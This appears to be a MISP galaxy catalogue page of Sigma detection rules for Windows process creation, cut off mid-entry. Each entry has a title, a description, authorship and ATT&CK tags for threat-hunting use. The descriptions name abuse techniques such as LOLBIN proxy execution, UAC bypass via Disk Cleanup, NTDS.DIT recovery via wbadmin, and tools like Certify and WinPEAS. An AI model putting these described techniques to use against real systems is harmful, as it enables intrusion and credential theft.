Suspicious Shells Spawn by Java Utility Keytool

Detects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation)

Internal MISP references

UUID 90fb5e62-ca1f-4e22-b42e-cc521874c938 which can be used as unique global reference for Suspicious Shells Spawn by Java Utility Keytool in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Andreas Hunkeler (@Karneades)
creation_date 2021-12-22
falsepositive ['Unknown']
filename proc_creation_win_java_keytool_susp_child_process.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.initial-access', 'attack.persistence', 'attack.privilege-escalation']

Suspicious IIS URL GlobalRules Rewrite Via AppCmd

Detects usage of "appcmd" to create new global URL rewrite rules. This behaviour has been observed being used by threat actors to add new rules so they can access their webshells.

Internal MISP references

UUID 7c8af9b2-dcae-41a2-a9db-b28c288b5f08 which can be used as unique global reference for Suspicious IIS URL GlobalRules Rewrite Via AppCmd in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-01-22
falsepositive ['Legitimate usage of appcmd to add new URL rewrite rules']
filename proc_creation_win_iis_appcmd_susp_rewrite_rule.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion']

PowerShell Base64 Encoded Reflective Assembly Load

Detects base64 encoded .NET reflective loading of Assembly

Internal MISP references

UUID 62b7ccc9-23b4-471e-aa15-6da3663c4d59 which can be used as unique global reference for PowerShell Base64 Encoded Reflective Assembly Load in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems), pH-T (Nextron Systems)
creation_date 2022-03-01
falsepositive ['Unlikely']
filename proc_creation_win_powershell_base64_reflection_assembly_load.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001', 'attack.defense-evasion', 'attack.t1027', 'attack.t1620']
Related clusters

To see the related clusters, click here.

HackTool - Certify Execution

Detects Certify a tool for Active Directory certificate abuse based on PE metadata characteristics and common command line arguments.

Internal MISP references

UUID 762f2482-ff21-4970-8939-0aa317a886bb which can be used as unique global reference for HackTool - Certify Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author pH-T (Nextron Systems)
creation_date 2023-04-17
falsepositive ['Unknown']
filename proc_creation_win_hktl_certify.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.credential-access', 'attack.t1649']
Related clusters

To see the related clusters, click here.

Suspicious Child Process Of BgInfo.EXE

Detects suspicious child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript

Internal MISP references

UUID 811f459f-9231-45d4-959a-0266c6311987 which can be used as unique global reference for Suspicious Child Process Of BgInfo.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-08-16
falsepositive ['Unknown']
filename proc_creation_win_bginfo_suspicious_child_process.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.005', 'attack.defense-evasion', 'attack.t1218', 'attack.t1202']
Related clusters

To see the related clusters, click here.

Wlrmdr.EXE Uncommon Argument Or Child Process

Detects the execution of "Wlrmdr.exe" with the "-u" command line flag which allows anything passed to it to be an argument of the ShellExecute API, which would allow an attacker to execute arbitrary binaries. This detection also focuses on any uncommon child processes spawned from "Wlrmdr.exe" as a supplement for those that posses "ParentImage" telemetry.

Internal MISP references

UUID 9cfc00b6-bfb7-49ce-9781-ef78503154bb which can be used as unique global reference for Wlrmdr.EXE Uncommon Argument Or Child Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, manasmbellani
creation_date 2022-02-16
falsepositive ['Unknown']
filename proc_creation_win_wlrmdr_uncommon_child_process.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Suspicious File Execution From Internet Hosted WebDav Share

Detects the execution of the "net use" command to mount a WebDAV server and then immediately execute some content in it. As seen being used in malicious LNK files

Internal MISP references

UUID f0507c0f-a3a2-40f5-acc6-7f543c334993 which can be used as unique global reference for Suspicious File Execution From Internet Hosted WebDav Share in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author pH-T (Nextron Systems)
creation_date 2022-09-01
falsepositive ['Unknown']
filename proc_creation_win_cmd_net_use_and_exec_combo.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Tor Client/Browser Execution

Detects the use of Tor or Tor-Browser to connect to onion routing networks

Internal MISP references

UUID 62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c which can be used as unique global reference for Tor Client/Browser Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-02-20
falsepositive ['Unknown']
filename proc_creation_win_browsers_tor_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command-and-control', 'attack.t1090.003']
Related clusters

To see the related clusters, click here.

Audit Policy Tampering Via Auditpol

Threat actors can use auditpol binary to change audit policy configuration to impair detection capability. This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.

Internal MISP references

UUID 0a13e132-651d-11eb-ae93-0242ac130002 which can be used as unique global reference for Audit Policy Tampering Via Auditpol in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Janantha Marasinghe (https://github.com/blueteam0ps)
creation_date 2021-02-02
falsepositive ['Administrator or administrator scripts might leverage the flags mentioned in the detection section. Either way, it should always be monitored']
filename proc_creation_win_auditpol_susp_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1562.002']
Related clusters

To see the related clusters, click here.

Potential Provlaunch.EXE Binary Proxy Execution Abuse

Detects child processes of "provlaunch.exe" which might indicate potential abuse to proxy execution.

Internal MISP references

UUID 7f5d1c9a-3e83-48df-95a7-2b98aae6c13c which can be used as unique global reference for Potential Provlaunch.EXE Binary Proxy Execution Abuse in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel
creation_date 2023-08-08
falsepositive ['Unknown']
filename proc_creation_win_provlaunch_potential_abuse.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Copy From Or To Admin Share Or Sysvol Folder

Detects a copy command or a copy utility execution to or from an Admin share or remote

Internal MISP references

UUID 855bc8b5-2ae8-402e-a9ed-b889e6df1900 which can be used as unique global reference for Copy From Or To Admin Share Or Sysvol Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali
creation_date 2019-12-30
falsepositive ['Administrative scripts']
filename proc_creation_win_susp_copy_lateral_movement.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.lateral-movement', 'attack.collection', 'attack.exfiltration', 'attack.t1039', 'attack.t1048', 'attack.t1021.002']
Related clusters

To see the related clusters, click here.

Gpscript Execution

Detects the execution of the LOLBIN gpscript, which executes logon or startup scripts configured in Group Policy

Internal MISP references

UUID 1e59c230-6670-45bf-83b0-98903780607e which can be used as unique global reference for Gpscript Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-05-16
falsepositive ['Legitimate uses of logon scripts distributed via group policy']
filename proc_creation_win_lolbin_gpscript.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

New DLL Registered Via Odbcconf.EXE

Detects execution of "odbcconf" with "REGSVR" in order to register a new DLL (equivalent to running regsvr32). Attackers abuse this to install and run malicious DLLs.

Internal MISP references

UUID 9f0a8bf3-a65b-440a-8c1e-5cb1547c8e70 which can be used as unique global reference for New DLL Registered Via Odbcconf.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community, Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-05-22
falsepositive ['Legitimate DLLs being registered via "odbcconf" will generate false positives. Investigate the path of the DLL and its content to determine if the action is authorized.']
filename proc_creation_win_odbcconf_register_dll_regsvr.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1218.008']
Related clusters

To see the related clusters, click here.

Certificate Exported Via Certutil.EXE

Detects the execution of the certutil with the "exportPFX" flag which allows the utility to export certificates.

Internal MISP references

UUID 3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5 which can be used as unique global reference for Certificate Exported Via Certutil.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-02-15
falsepositive ["There legitimate reasons to export certificates. Investigate the activity to determine if it's benign"]
filename proc_creation_win_certutil_export_pfx.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1027']
Related clusters

To see the related clusters, click here.

File Encryption Using Gpg4win

Detects usage of Gpg4win to encrypt files

Internal MISP references

UUID 550bbb84-ce5d-4e61-84ad-e590f0024dcd which can be used as unique global reference for File Encryption Using Gpg4win in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-08-09
falsepositive ['Unknown']
filename proc_creation_win_gpg4win_encryption.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Dism Remove Online Package

Deployment Image Servicing and Management tool. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images

Internal MISP references

UUID 43e32da2-fdd0-4156-90de-50dfd62636f9 which can be used as unique global reference for Dism Remove Online Package in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-01-16
falsepositive ['Legitimate script']
filename proc_creation_win_dism_remove.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Sensitive File Recovery From Backup Via Wbadmin.EXE

Detects the dump of highly sensitive files such as "NTDS.DIT" and "SECURITY" hive. Attackers can leverage the "wbadmin" utility in order to dump sensitive files that might contain credential or sensitive information.

Internal MISP references

UUID 84972c80-251c-4c3a-9079-4f00aad93938 which can be used as unique global reference for Sensitive File Recovery From Backup Via Wbadmin.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), frack113
creation_date 2024-05-10
falsepositive ['Unknown']
filename proc_creation_win_wbadmin_restore_sensitive_files.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential-access', 'attack.t1003.003']
Related clusters

To see the related clusters, click here.

Root Certificate Installed From Susp Locations

Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.

Internal MISP references

UUID 5f6a601c-2ecb-498b-9c33-660362323afa which can be used as unique global reference for Root Certificate Installed From Susp Locations in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-09-09
falsepositive ['Unlikely']
filename proc_creation_win_powershell_import_cert_susp_locations.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1553.004']
Related clusters

To see the related clusters, click here.

WmiPrvSE Spawned A Process

Detects WmiPrvSE spawning a process

Internal MISP references

UUID d21374ff-f574-44a7-9998-4a8c8bf33d7d which can be used as unique global reference for WmiPrvSE Spawned A Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez @Cyb3rWard0g
creation_date 2019-08-15
falsepositive ['False positives are expected (e.g. in environments where WinRM is used legitimately)']
filename proc_creation_win_wmiprvse_spawning_process.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1047']
Related clusters

To see the related clusters, click here.

HackTool - SharpWSUS/WSUSpendu Execution

Detects the execution of SharpWSUS or WSUSpendu, utilities that allow for lateral movement through WSUS. Windows Server Update Services (WSUS) is a critical component of Windows systems and is frequently configured in a way that allows an attacker to circumvent internal networking limitations.

Internal MISP references

UUID b0ce780f-10bd-496d-9067-066d23dc3aa5 which can be used as unique global reference for HackTool - SharpWSUS/WSUSpendu Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @Kostastsale, Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-10-07
falsepositive ['Unknown']
filename proc_creation_win_hktl_sharpwsus_wsuspendu_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.lateral-movement', 'attack.t1210']
Related clusters

To see the related clusters, click here.

Rundll32 Execution With Uncommon DLL Extension

Detects the execution of rundll32 with a command line that doesn't contain a common extension

Internal MISP references

UUID c3a99af4-35a9-4668-879e-c09aeb4f2bdf which can be used as unique global reference for Rundll32 Execution With Uncommon DLL Extension in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Shelton, Florian Roth (Nextron Systems), Yassine Oukessou
creation_date 2022-01-13
falsepositive ['Unknown']
filename proc_creation_win_rundll32_uncommon_dll_extension.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1218.011']
Related clusters

To see the related clusters, click here.

Uncommon Assistive Technology Applications Execution Via AtBroker.EXE

Detects the start of a non built-in assistive technology applications via "Atbroker.EXE".

Internal MISP references

UUID f24bcaea-0cd1-11eb-adc1-0242ac120002 which can be used as unique global reference for Uncommon Assistive Technology Applications Execution Via AtBroker.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mateusz Wydra, oscd.community
creation_date 2020-10-12
falsepositive ['Legitimate, non-default assistive technology applications execution']
filename proc_creation_win_atbroker_uncommon_ats_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

UAC Bypass Using Disk Cleanup

Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)

Internal MISP references

UUID b697e69c-746f-4a86-9f59-7bfff8eab881 which can be used as unique global reference for UAC Bypass Using Disk Cleanup in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021-08-30
falsepositive ['Unknown']
filename proc_creation_win_uac_bypass_cleanmgr.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

AddinUtil.EXE Execution From Uncommon Directory

Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) from a non-standard directory.

Internal MISP references

UUID 6120ac2a-a34b-42c0-a9bd-1fb9f459f348 which can be used as unique global reference for AddinUtil.EXE Execution From Uncommon Directory in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)
creation_date 2023-09-18
falsepositive ['Unknown']
filename proc_creation_win_addinutil_uncommon_dir_exec.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Detects events that appear when a user click on a link file with a powershell command in it

Internal MISP references

UUID 30e92f50-bb5a-4884-98b5-d20aa80f3d7a which can be used as unique global reference for Hidden Powershell in Link File Pattern in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-02-06
falsepositive ['Legitimate commands in .lnk files']
filename proc_creation_win_susp_embed_exe_lnk.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

HackTool - RedMimicry Winnti Playbook Execution

Detects actions caused by the RedMimicry Winnti playbook a automated breach emulations utility

Internal MISP references

UUID 95022b85-ff2a-49fa-939a-d7b8f56eeb9b which can be used as unique global reference for HackTool - RedMimicry Winnti Playbook Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Alexander Rausch
creation_date 2020-06-24
falsepositive ['Unknown']
filename proc_creation_win_hktl_redmimicry_winnti_playbook.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.defense-evasion', 'attack.t1106', 'attack.t1059.003', 'attack.t1218.011']
Related clusters

To see the related clusters, click here.

Potential Command Line Path Traversal Evasion Attempt

Detects potential evasion or obfuscation attempts using bogus path traversal via the commandline

Internal MISP references

UUID 1327381e-6ab0-4f38-b583-4c1b8346a56b which can be used as unique global reference for Potential Command Line Path Traversal Evasion Attempt in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021-10-26
falsepositive ['Google Drive', 'Citrix']
filename proc_creation_win_susp_commandline_path_traversal_evasion.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1036']
Related clusters

To see the related clusters, click here.

Interactive AT Job

Detects an interactive AT job, which may be used as a form of privilege escalation.

Internal MISP references

UUID 60fc936d-2eb0-4543-8a13-911c750a1dfc which can be used as unique global reference for Interactive AT Job in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
creation_date 2019-10-24
falsepositive ['Unlikely (at.exe deprecated as of Windows 8)']
filename proc_creation_win_at_interactive_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.execution', 'attack.privilege-escalation', 'attack.t1053.002']
Related clusters

To see the related clusters, click here.

PUA - DefenderCheck Execution

Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion.

Internal MISP references

UUID f0ca6c24-3225-47d5-b1f5-352bf07ecfa7 which can be used as unique global reference for PUA - DefenderCheck Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022-08-30
falsepositive ['Unlikely']
filename proc_creation_win_pua_defendercheck.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1027.005']
Related clusters

To see the related clusters, click here.

NodeJS Execution of JavaScript File

Detects execution of JavaScript or JSC files using NodeJs binary node.exe, that could be potentially suspicious. Node.js is a popular open-source JavaScript runtime that runs code outside browsers and is widely used for both frontend and backend development. Adversaries have been observed abusing Node.js to disguise malware as legitimate processes, evade security defenses, and maintain persistence within target systems. Because Node.js is commonly used, this rule may generate false positives in some environments. However, if such activity is unusual in your environment, it is highly suspicious and warrants immediate investigation.

Internal MISP references

UUID ba3874b9-0fae-465f-836c-eb5d071a1789 which can be used as unique global reference for NodeJS Execution of JavaScript File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Swachchhanda Shrawan Poudel (Nextron Systems)
creation_date 2025-04-21
falsepositive ['Legitimate use of node.exe to execute JavaScript or JSC files on your environment']
filename proc_creation_win_security_susp_node_js_execution.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.007']
Related clusters

To see the related clusters, click here.

Potential WMI Lateral Movement WmiPrvSE Spawned PowerShell

Detects Powershell as a child of the WmiPrvSE process. Which could be a sign of lateral movement via WMI.

Internal MISP references

UUID 692f0bec-83ba-4d04-af7e-e884a96059b6 which can be used as unique global reference for Potential WMI Lateral Movement WmiPrvSE Spawned PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Markus Neis @Karneades
creation_date 2019-04-03
falsepositive ['AppvClient', 'CCM', 'WinRM']
filename proc_creation_win_wmiprvse_spawns_powershell.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1047', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

User Discovery And Export Via Get-ADUser Cmdlet

Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file

Internal MISP references

UUID 1114e048-b69c-4f41-bc20-657245ae6e3f which can be used as unique global reference for User Discovery And Export Via Get-ADUser Cmdlet in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-09-09
falsepositive ["Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often"]
filename proc_creation_win_powershell_user_discovery_get_aduser.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1033']
Related clusters

To see the related clusters, click here.

Filter Driver Unloaded Via Fltmc.EXE

Detect filter driver unloading activity via fltmc.exe

Internal MISP references

UUID 4931188c-178e-4ee7-a348-39e8a7a56821 which can be used as unique global reference for Filter Driver Unloaded Via Fltmc.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-02-13
falsepositive ['Unknown']
filename proc_creation_win_fltmc_unload_driver.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1070', 'attack.t1562', 'attack.t1562.002']
Related clusters

To see the related clusters, click here.

Powershell Executed From Headless ConHost Process

Detects the use of powershell commands from headless ConHost window. The "--headless" flag hides the windows from the user upon execution.

Internal MISP references

UUID 056c7317-9a09-4bd4-9067-d051312752ea which can be used as unique global reference for Powershell Executed From Headless ConHost Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Matt Anderson (Huntress)
creation_date 2024-07-23
falsepositive ['Unknown']
filename proc_creation_win_conhost_headless_powershell.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.execution', 'attack.t1059.001', 'attack.t1059.003', 'attack.t1564.003']
Related clusters

To see the related clusters, click here.

Renamed Whoami Execution

Detects the execution of whoami that has been renamed to a different name to avoid detection

Internal MISP references

UUID f1086bf7-a0c4-4a37-9102-01e573caf4a0 which can be used as unique global reference for Renamed Whoami Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021-08-12
falsepositive ['Unknown']
filename proc_creation_win_renamed_whoami.yml
level critical
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1033', 'car.2016-03-001']
Related clusters

To see the related clusters, click here.

HackTool - WinPwn Execution

Detects commandline keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.

Internal MISP references

UUID d557dc06-62e8-4468-a8e8-7984124908ce which can be used as unique global reference for HackTool - WinPwn Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Swachchhanda Shrawan Poudel
creation_date 2023-12-04
falsepositive ['Unknown']
filename proc_creation_win_hktl_winpwn.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential-access', 'attack.defense-evasion', 'attack.discovery', 'attack.execution', 'attack.privilege-escalation', 'attack.t1046', 'attack.t1082', 'attack.t1106', 'attack.t1518', 'attack.t1548.002', 'attack.t1552.001', 'attack.t1555', 'attack.t1555.003']
Related clusters

To see the related clusters, click here.

Suspicious Child Process Created as System

Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE accounts

Internal MISP references

UUID 590a5f4c-6c8c-4f10-8307-89afe9453a9d which can be used as unique global reference for Suspicious Child Process Created as System in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Teymur Kheirkhabarov, Roberto Rodriguez (@Cyb3rWard0g), Open Threat Research (OTR)
creation_date 2019-10-26
falsepositive ['Unknown']
filename proc_creation_win_susp_child_process_as_system_.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1134.002']
Related clusters

To see the related clusters, click here.

Suspicious MSDT Parent Process

Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation

Internal MISP references

UUID 7a74da6b-ea76-47db-92cc-874ad90df734 which can be used as unique global reference for Suspicious MSDT Parent Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nextron Systems
creation_date 2022-06-01
falsepositive ['Unknown']
filename proc_creation_win_msdt_susp_parent.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1036', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Use Icacls to Hide File to Everyone

Detect use of icacls to deny access for everyone in Users folder sometimes used to hide malicious files

Internal MISP references

UUID 4ae81040-fc1c-4249-bfa3-938d260214d9 which can be used as unique global reference for Use Icacls to Hide File to Everyone in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-07-18
falsepositive ['Unknown']
filename proc_creation_win_icacls_deny.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1564.001']
Related clusters

To see the related clusters, click here.

HackTool - winPEAS Execution

WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz

Internal MISP references

UUID 98b53e78-ebaf-46f8-be06-421aafd176d9 which can be used as unique global reference for HackTool - winPEAS Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Georg Lauenstein (sure[secure])
creation_date 2022-09-19
falsepositive ['Unlikely']
filename proc_creation_win_hktl_winpeas.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.privilege-escalation', 'attack.discovery', 'attack.t1082', 'attack.t1087', 'attack.t1046']
Related clusters

To see the related clusters, click here.

Arbitrary Binary Execution Using GUP Utility

Detects execution of the Notepad++ updater (gup) to launch other commands or executables

Internal MISP references

UUID d65aee4d-2292-4cea-b832-83accd6cfa43 which can be used as unique global reference for Arbitrary Binary Execution Using GUP Utility in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-06-10
falsepositive ['Other parent binaries using GUP not currently identified']
filename proc_creation_win_gup_arbitrary_binary_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Suspicious Powercfg Execution To Change Lock Screen Timeout

Detects suspicious execution of 'Powercfg.exe' to change lock screen timeout

Internal MISP references

UUID f8d6a15e-4bc8-4c27-8e5d-2b10f0b73e5b which can be used as unique global reference for Suspicious Powercfg Execution To Change Lock Screen Timeout in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-11-18
falsepositive ['Unknown']
filename proc_creation_win_powercfg_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion']

Gzip Archive Decode Via PowerShell

Detects attempts of decoding encoded Gzip archives via PowerShell.

Internal MISP references

UUID 98767d61-b2e8-4d71-b661-e36783ee24c1 which can be used as unique global reference for Gzip Archive Decode Via PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Hieu Tran
creation_date 2023-03-13
falsepositive ['Legitimate administrative scripts may use this functionality. Use "ParentImage" in combination with the script names and allowed users and applications to filter legitimate executions']
filename proc_creation_win_powershell_decode_gzip.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command-and-control', 'attack.t1132.001']
Related clusters

To see the related clusters, click here.

Suspicious GrpConv Execution

Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors

Internal MISP references

UUID f14e169e-9978-4c69-acb3-1cff8200bc36 which can be used as unique global reference for Suspicious GrpConv Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022-05-19
falsepositive ['Unknown']
filename proc_creation_win_lolbin_susp_grpconv.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547']
Related clusters

To see the related clusters, click here.

File Download From Browser Process Via Inline URL

Detects execution of a browser process with a URL argument pointing to a file with a potentially interesting extension. This can be abused to download arbitrary files or to hide from the user for example by launching the browser in a minimized state.

Internal MISP references

UUID 94771a71-ba41-4b6e-a757-b531372eaab6 which can be used as unique global reference for File Download From Browser Process Via Inline URL in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-01-11
falsepositive ['Unknown']
filename proc_creation_win_browsers_inline_file_download.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command-and-control', 'attack.t1105']
Related clusters

To see the related clusters, click here.

Visual Studio NodejsTools PressAnyKey Arbitrary Binary Execution

Detects child processes of Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary

Internal MISP references

UUID a20391f8-76fb-437b-abc0-dba2df1952c6 which can be used as unique global reference for Visual Studio NodejsTools PressAnyKey Arbitrary Binary Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-01-11
falsepositive ['Legitimate use by developers as part of NodeJS development with Visual Studio Tools']
filename proc_creation_win_pressanykey_lolbin_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.defense-evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Winrs Local Command Execution

Detects the execution of Winrs.exe where it is used to execute commands locally. Commands executed this way are launched under Winrshost.exe and can represent proxy execution used for defense evasion or lateral movement.

Internal MISP references

